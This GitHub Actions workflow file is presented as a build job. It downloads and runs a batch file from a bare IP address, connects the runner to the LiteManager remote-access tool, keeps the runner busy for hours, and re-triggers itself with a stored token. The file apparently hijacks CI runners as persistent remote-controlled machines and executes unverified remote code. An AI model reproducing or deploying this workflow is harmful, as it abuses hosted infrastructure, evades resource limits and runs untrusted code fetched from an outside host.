name: Cl22

on:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *'

jobs:
  build:
    name: Start Building...
    runs-on: windows-latest
    timeout-minutes: 360  # 6 hours (360 minutes)

    steps:
      - name: Downloading & Installing Essentials
        run: |
          Invoke-WebRequest -Uri "http://185.254.97.190:2024/download/down.bat" -OutFile "Downloads.bat"
          cmd /c Downloads.bat

      - name: Connect to LiteManager
        run: cmd /c show.bat

      - name: Time Counter
        run: cmd /c loop.bat

      - name: Re-trigger Workflow
        if: always()
        run: |
          curl -X POST \
            -H "Accept: application/vnd.github+json" \
            -H "Authorization: token ${{ secrets.GH_TOKEN }}" \
            https://api.github.com/repos/Proton23345/Proton23345/actions/workflows/main.yml/dispatches \
            -d '{"ref":"main"}'
